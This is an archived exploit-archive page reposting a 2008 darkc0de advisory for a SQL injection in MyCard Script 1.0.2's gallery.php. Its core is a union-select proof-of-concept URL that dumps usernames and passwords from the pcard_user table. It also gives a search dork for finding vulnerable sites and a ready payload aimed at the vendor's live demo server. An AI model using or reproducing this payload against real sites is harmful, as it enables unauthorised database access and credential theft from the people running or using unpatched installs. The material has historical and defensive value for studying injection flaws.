Twenty Year Anniversary

mycard-sql.txt

mycard-sql.txt
Posted Sep 28, 2008
Authored by r45c4l | Site darkc0de.com

MyCard Script version 1.0.2 suffers from a remote SQL injection vulnerability in gallery.php.

tags | exploit, remote, php, sql injection
MD5 | 4a4ff489a54db9c0f2ba16962b423ea7

mycard-sql.txt

Change Mirror Download
################################################################ 
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz #
# and all darkc0de and NikTrix members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com & niktrix.info
#
# Email : r45c4l@hotmail.com
#
# Share the c0de!
#
################################################################
#
# Title: MyCard script 1.0.2 (gallery.php?id) SQL Injection
#
# VEndor: http://www.tufat.com/s_business_card_designer.htm
#
#
###########################################################
#
# d0rk: Powered by MyCard
#
###########################################################

POC :-

http://www.site.com/[path]/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/*

Live Demo:

For live demo first go here : http://demo.tufat.com/mycard/index.php and register and then u can test like this :

http://demo.tufat.com/mycard/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/*

###########################################################
#
# Bug discovered : 28 Sep.2008
###########################################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    19 Files
  • 18
    Oct 18th
    21 Files
  • 19
    Oct 19th
    16 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close